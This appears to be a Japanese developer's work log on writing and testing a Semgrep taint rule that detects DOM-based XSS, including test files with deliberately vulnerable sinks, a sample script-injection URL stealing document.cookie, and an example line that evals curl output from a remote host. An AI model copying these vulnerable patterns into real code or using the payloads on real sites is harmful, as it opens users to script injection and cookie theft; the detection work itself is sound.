Semgrep で DOM-XSS を検出するルールを作ってみる
Registry にルールがないか探してみる
それっぽいルール
このルールをベースに作ってみよう。
やること
- テストコードを書く
- taint mode で source-sink で検出できるようにする
- source と sink を増やして検出力アップ
テストコードもリポジトリにあるやつをベースに
window.location が source のパターンを想定してテストを改変
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
元のテストコードでルールを実行
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Ran 1 rule on 1 file: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
user@develop:/mnt/c/semgrep/dom-xss$
user@develop:/mnt/c/semgrep/dom-xss$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to
construct an element added directly to the page. For example, a malicious actor could send
someone a link like this:
http://www.some.site/page.html?default=<script>alert(document.cookie)</script> which would
add the script to the page. Consider allowlisting appropriate values or using an approach
which does not involve the URL.
2┆ document.write("<OPTION value=1>"+document.location.href.substring(document.location.href.indexOf("default=")+8)+"</OPTION>");
Ran 1 rule on 1 file: 1 finding.
改変したテストコードで実行。検出できないことを確認。
$ semgrep --config dom-based-xss.yaml dom-based-xss2.js
Scanning 1 file.
Ran 1 rule on 1 file: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
ルール改造の邪魔なのでメタデータを消しておく
rules:
- id: dom-based-xss
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-either:
- pattern: document.write(<... document.location.$W ...>)
- pattern: document.write(<... location.$W ...>)
taint mode にして sink と source を書く
rules:
- id: dom-based-xss
mode: taint
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-sources:
- pattern: window.location
pattern-sinks:
- pattern-either:
- pattern: document.write(...)
実行。検出できた!
$ semgrep --config dom-based-xss.yaml dom-based-xss2.js
Scanning 1 file.
Findings:
dom-based-xss2.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
Ran 1 rule on 1 file: 2 findings
次は source を増やしたい。dom-xss の source になりそうなものは
主な sink の一覧を発見。sinkからやるか
rules:
- id: dom-based-xss
mode: taint
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-sources:
- pattern: window.location
pattern-sinks:
- pattern-either:
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: document.domain = $PAYLOAD
- pattern: element.innerHTML = $PAYLOAD
- pattern: element.outerHTML = $PAYLOAD
テストコード
const qs = window.location.search;
const hash = window.location.hash
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
const element = document.createElement('p');
// ng
element.innerHTML = qs;
// ng
element.innerHTML = hash;
// ok
element.innerHTML = "test"
element.innerHTML = "test"
が誤検知されてしまった。なんでや
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
15┆ element.innerHTML = qs;
⋮┆----------------------------------------
18┆ element.innerHTML = hash;
⋮┆----------------------------------------
21┆ element.innerHTML = "test"
Ran 1 rule on 1 file: 5 findings.
const qs = window.location.search;
const hash = window.location.hash
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
// ng
const element = document.createElement('p');
// ng
element.innerHTML = qs;
// ng
element.innerHTML = hash;
// ok
element.innerHTML = "test"
// ok
element.innerHTML = "test2"
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
15┆ element.innerHTML = qs;
⋮┆----------------------------------------
18┆ element.innerHTML = hash;
⋮┆----------------------------------------
21┆ element.innerHTML = "test"
Ran 1 rule on 1 file: 5 findings.
"test2" は検出されない。21行目時点の element.innerHTML は tainted と判定されてしまうのかな?
今度は検出されなくなった。なんでや
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
Ran 1 rule on 1 file: 2 findings.
ルールが metavariable になってなかった。修正
rules:
- id: dom-based-xss
mode: taint
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-sources:
- pattern: window.location
pattern-sinks:
- pattern-either:
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: document.domain = $PAYLOAD
- pattern: $ELEMENT.innerHTML = $PAYLOAD
- pattern: $ELEMENT.outerHTML = $PAYLOAD
ヨシ
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
13┆ e1.innerHTML = qs;
⋮┆----------------------------------------
17┆ e2.innerHTML = hash;
Ran 1 rule on 1 file: 4 findings.
jQuery の sink もいくつか追加してみよう。とありあえず add() と html()
テストケース追加
// ok
$("div.test").html("test")
// ng
$("div.test").html(hash)
// ng
$("div.test").add(qs)
ルールも追加
rules:
- id: dom-based-xss
mode: taint
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-sources:
- pattern: window.location
pattern-sinks:
- pattern-either:
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: document.domain = $PAYLOAD
- pattern: $ELEMENT.innerHTML = $PAYLOAD
- pattern: $ELEMENT.outerHTML = $PAYLOAD
- pattern: $JQ.add($PAYLOAD)
- pattern: $JQ.html($PAYLOAD)
ちゃんと検出できてる
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
13┆ e1.innerHTML = qs;
⋮┆----------------------------------------
17┆ e2.innerHTML = hash;
⋮┆----------------------------------------
27┆ $("div.test").html(hash)
⋮┆----------------------------------------
30┆ $("div.test").add(qs)
Ran 1 rule on 1 file: 6 findings.
source を増やしたい
面白い記事見つけた
ここからパクろう
rules:
- id: dom-based-xss
mode: taint
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-sources:
- pattern-either:
- pattern: location
- pattern: document.URL
- pattern: window.name
- pattern: document.referrer
- pattern: document.documentURI
- pattern: document.baseURI
- pattern: document.cookie
pattern-sinks:
- pattern-either:
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: document.domain = $PAYLOAD
- pattern: $ELEMENT.innerHTML = $PAYLOAD
- pattern: $ELEMENT.outerHTML = $PAYLOAD
- pattern: $JQ.add($PAYLOAD)
- pattern: $JQ.html($PAYLOAD)
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
// ng
const e1 = document.createElement('p');
e1.innerHTML = qs;
// ng
const e2 = document.createElement('p');
e2.innerHTML = hash;
// ok
const e3 = document.createElement('p');
e3.innerHTML = "test"
// ok
$("div.test").html("test")
// ng
$("div.test").html(hash)
// ng
$("div.test").add(qs)
// ng
const referer = document.referrer
$("div.test").add(referer.substring(1,2))
新しく追加したルールは検出されたけど、いままでのがダメになってしまった
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
34┆ $("div.test").add(referer.substring(1,2))
Ran 1 rule on 1 file: 1 finding.
location
だと window.location
にマッチしないからか。そらそうだ
ルールを修正したらいけた
rules:
- id: dom-based-xss
mode: taint
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-sources:
- pattern-either:
- pattern: location
- pattern: window.location
- pattern: document.location
- pattern: document.URL
- pattern: window.name
- pattern: document.referrer
- pattern: document.documentURI
- pattern: document.baseURI
- pattern: document.cookie
pattern-sinks:
- pattern-either:
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: document.domain = $PAYLOAD
- pattern: $ELEMENT.innerHTML = $PAYLOAD
- pattern: $ELEMENT.outerHTML = $PAYLOAD
- pattern: $JQ.add($PAYLOAD)
- pattern: $JQ.html($PAYLOAD)
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
13┆ e1.innerHTML = qs;
⋮┆----------------------------------------
17┆ e2.innerHTML = hash;
⋮┆----------------------------------------
27┆ $("div.test").html(hash)
⋮┆----------------------------------------
30┆ $("div.test").add(qs)
⋮┆----------------------------------------
34┆ $("div.test").add(referer.substring(1,2))
Ran 1 rule on 1 file: 7 findings.
こんなことをしても検出できるか?
const searchParams = new URLSearchParams(window.location.search)
const firstname = searchParams.get('firstname')
$("div.test").add(firstname)
検出できた
39┆ $("div.test").add(firstname)
const names = [searchParams.get('firstname'), searchParams.get('lastname')]
$("div.test").add(names.join(' '))
すごい
43┆ $("div.test").add(names.join(' '))
検出されないパターンを発見
const arr = []
arr.push(searchParams.get('firstname'))
arr.push(searchParams.get('lastname'))
$("div.test2").add(arr.join(' '))
arr は tainted と判断されないのか。
このパターンを検出できるようにしたい
const arr = []
arr.push(searchParams.get('firstname'))
arr.push(searchParams.get('lastname'))
$("div.test2").html(arr.join(' '))
できたもの
rules:
- id: dom-based-xss
mode: taint
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-sources:
- pattern-either:
- pattern: location
- pattern: window.location
- pattern: document.location
- pattern: document.URL
- pattern: window.name
- pattern: document.referrer
- pattern: document.documentURI
- pattern: document.baseURI
- pattern: document.cookie
pattern-propagators:
- pattern: $S.push($E)
from: $E
to: $S
pattern-sinks:
- pattern-either:
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: document.domain = $PAYLOAD
- pattern: $ELEMENT.innerHTML = $PAYLOAD
- pattern: $ELEMENT.outerHTML = $PAYLOAD
- pattern: $JQ.add($PAYLOAD)
- pattern: $JQ.html($PAYLOAD)
テストコード
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
// ng
const e1 = document.createElement('p');
e1.innerHTML = qs;
// ng
const e2 = document.createElement('p');
e2.innerHTML = hash;
// ok
const e3 = document.createElement('p');
e3.innerHTML = "test"
// ok
$("div.test").html("test")
// ng
$("div.test").html(hash)
// ng
$("div.test").add(qs)
// ng
const referer = document.referrer
$("div.test").add(referer.substring(1,2))
// ng
const searchParams = new URLSearchParams(window.location.search)
const firstname = searchParams.get('firstname')
$("div.test").add(firstname)
// ng
const names = [searchParams.get('firstname'), searchParams.get('lastname')]
$("div.test").add(names.join(' '))
// ng
const arr = []
arr.push(searchParams.get('firstname'))
arr.push(searchParams.get('lastname'))
$("div.test2").html(arr.join(' '))
実行結果
$ semgrep --config dom-based-xss.yaml dom-based-xss.js
Scanning 1 file.
Findings:
dom-based-xss.js
dom-based-xss
dom-xss
5┆ document.write(qs);
⋮┆----------------------------------------
6┆ document.write(hash);
⋮┆----------------------------------------
13┆ e1.innerHTML = qs;
⋮┆----------------------------------------
17┆ e2.innerHTML = hash;
⋮┆----------------------------------------
27┆ $("div.test").html(hash)
⋮┆----------------------------------------
30┆ $("div.test").add(qs)
⋮┆----------------------------------------
34┆ $("div.test").add(referer.substring(1,2))
⋮┆----------------------------------------
39┆ $("div.test").add(firstname)
⋮┆----------------------------------------
43┆ $("div.test").add(names.join(' '))
⋮┆----------------------------------------
49┆ $("div.test2").html(arr.join(' '))
Ran 1 rule on 1 file: 10 findings.
javascript が html に埋め込まれてる場合は検出できないらしい
<html>
<body>
<script>
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
</script>
</body>
</html>
$ semgrep --config dom-based-xss.yaml dom-based-xss.html
Nothing to scan.
Ran 1 rule on 0 files: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
できるかも?
こんな感じ?
- id: extract-html-to-javascript
mode: extract
languages:
- html
pattern: <script ...>$...SCRIPT</script>
extract: $...SCRIPT
dest-language: javascript
いかん
$ semgrep --config dom-based-xss.yaml dom-based-xss.html
Scanning 1 file.
Ran 2 rules on 1 file: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
パターンは間違ってなさそう
rules:
- id: extract-html-to-javascript
languages:
- html
pattern: <script>$...SCRIPT</script>
message: test
severity: INFO
$ semgrep --config html.yaml dom-based-xss.html
Scanning 1 file.
Findings:
dom-based-xss.html
extract-html-to-javascript
test
3┆ <script>
4┆ const qs = window.location.search;
5┆ const hash = window.location.hash;
6┆
7┆ // ruleid:dom-based-xss
8┆ document.write(qs);
9┆ document.write(hash);
10┆
11┆ // ok:dom-based-xss
12┆ document.write("<OPTION value=2>English</OPTION>");
[hid 1 additional lines, adjust with --max-lines-per-finding]
Ran 1 rule on 1 file: 1 finding.
ルールの順番かも
rules:
- id: curl-eval
severity: WARNING
languages:
- bash
message: Evaluating data from a `curl` command is unsafe.
mode: taint
pattern-sources:
- pattern: |
$(curl ...)
- pattern: |
`curl ...`
pattern-sinks:
- pattern: eval ...
- id: extract-docker-run-to-bash
mode: extract
languages:
- dockerfile
pattern: RUN $...CMD
extract: $...CMD
dest-language: bash
- id: extract-python-os-system-to-bash
mode: extract
languages:
- python
pattern: os.system("$CMD")
extract: $CMD
dest-language: bash
$ semgrep --config _extract-test.yaml _extract-test.py
Scanning 1 file.
Findings:
_extract-test.py
curl-eval
Evaluating data from a `curl` command is unsafe.
3┆ if system('eval `curl -s "http://www.very-secure-website.net"`'):
Ran 3 rules on 1 file: 1 finding.
rules:
- id: extract-docker-run-to-bash
mode: extract
languages:
- dockerfile
pattern: RUN $...CMD
extract: $...CMD
dest-language: bash
- id: extract-python-os-system-to-bash
mode: extract
languages:
- python
pattern: os.system("$CMD")
extract: $CMD
dest-language: bash
- id: curl-eval
severity: WARNING
languages:
- bash
message: Evaluating data from a `curl` command is unsafe.
mode: taint
pattern-sources:
- pattern: |
$(curl ...)
- pattern: |
`curl ...`
pattern-sinks:
- pattern: eval ...
$ semgrep --config _extract-test.yaml _extract-test.py
Scanning 1 file.
Ran 3 rules on 1 file: 0 findings.
If Semgrep missed a finding, please send us feedback to let us know!
$ semgrep shouldafound --help
extract ルールは後に書く必要がある?
できた!!
rules:
- id: dom-based-xss
mode: taint
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-sources:
- pattern-either:
- pattern: location
- pattern: window.location
- pattern: document.location
- pattern: document.URL
- pattern: window.name
- pattern: document.referrer
- pattern: document.documentURI
- pattern: document.baseURI
- pattern: document.cookie
pattern-propagators:
- pattern: $S.push($E)
from: $E
to: $S
pattern-sinks:
- pattern-either:
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: document.domain = $PAYLOAD
- pattern: $ELEMENT.innerHTML = $PAYLOAD
- pattern: $ELEMENT.outerHTML = $PAYLOAD
- pattern: $JQ.add($PAYLOAD)
- pattern: $JQ.html($PAYLOAD)
- id: extract-html-to-javascript
mode: extract
languages:
- html
pattern: <script>$...SCRIPT</script>
extract: $...SCRIPT
dest-language: javascript
$ semgrep --config dom-based-xss.yaml dom-based-xss.html
Scanning 1 file.
Findings:
dom-based-xss.html
dom-based-xss
dom-xss
8┆ document.write(qs);
⋮┆----------------------------------------
9┆ document.write(hash);
Ran 2 rules on 1 file: 2 findings.
実際使うときは extract ルールは別ファイルにして、コマンドで順番を指定するのがよさそう
$ semgrep --config dom-based-xss.yaml --config extract-html-to-javascript.yaml dom-based-xss.html
Scanning 1 file.
Findings:
dom-based-xss.html
dom-based-xss
dom-xss
8┆ document.write(qs);
⋮┆----------------------------------------
9┆ document.write(hash);
Ran 2 rules on 1 file: 2 findings.
できたもの
rules:
- id: dom-based-xss
mode: taint
message: dom-xss
languages:
- javascript
- typescript
severity: ERROR
pattern-sources:
- pattern-either:
- pattern: location
- pattern: window.location
- pattern: document.location
- pattern: document.URL
- pattern: window.name
- pattern: document.referrer
- pattern: document.documentURI
- pattern: document.baseURI
- pattern: document.cookie
pattern-propagators:
- pattern: $S.push($E)
from: $E
to: $S
pattern-sinks:
- pattern-either:
- pattern: document.write(...)
- pattern: document.writeln(...)
- pattern: document.domain = $PAYLOAD
- pattern: $ELEMENT.innerHTML = $PAYLOAD
- pattern: $ELEMENT.outerHTML = $PAYLOAD
- pattern: $JQ.add($PAYLOAD)
- pattern: $JQ.html($PAYLOAD)
rules:
- id: extract-html-to-javascript
mode: extract
languages:
- html
pattern: <script>$...SCRIPT</script>
extract: $...SCRIPT
dest-language: javascript
テストデータ
<html>
<body>
<script>
const qs = window.location.search;
const hash = window.location.hash;
// ruleid:dom-based-xss
document.write(qs);
document.write(hash);
// ok:dom-based-xss
document.write("<OPTION value=2>English</OPTION>");
</script>
</body>
</html>
実行結果
$ semgrep --config dom-based-xss.yaml --config extract-html-to-javascript.yaml dom-based-xss.html
Scanning 1 file.
Findings:
dom-based-xss.html
dom-based-xss
dom-xss
8┆ document.write(qs);
⋮┆----------------------------------------
9┆ document.write(hash);
Ran 2 rules on 1 file: 2 findings.
githubに置いた